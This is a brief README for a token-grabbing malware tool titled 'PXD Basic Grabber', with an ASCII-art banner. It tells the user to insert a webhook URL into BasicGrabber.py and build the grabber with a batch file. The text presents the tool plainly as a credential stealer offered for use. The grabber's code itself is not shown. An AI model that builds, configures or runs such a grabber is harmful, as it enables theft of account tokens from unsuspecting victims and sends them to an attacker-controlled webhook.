88""Yb Yb  dP 8888b.      88""Yb    db    .dP"Y8 88  dP""b8      dP""b8 88""Yb    db    88""Yb 88""Yb 888888 88""Yb 
88__dP  YbdP   8I  Yb     88__dP   dPYb   `Ybo." 88 dP   `"     dP   `" 88__dP   dPYb   88__dP 88__dP 88__   88__dP 
88"""   dPYb   8I  dY     88""Yb  dP__Yb  o.`Y8b 88 Yb          Yb  "88 88"Yb   dP__Yb  88""Yb 88""Yb 88""   88"Yb  
88     dP  Yb 8888Y"      88oodP dP""""Yb 8bodP' 88  YboodP      YboodP 88  Yb dP""""Yb 88oodP 88oodP 888888 88  Yb 



Hi There,

This is my tokengrabber you can change in the script called BasicGrabber.py the webhook URL were currently stands webhook URL
You could run it using the batchfile called builder and its very easy to use.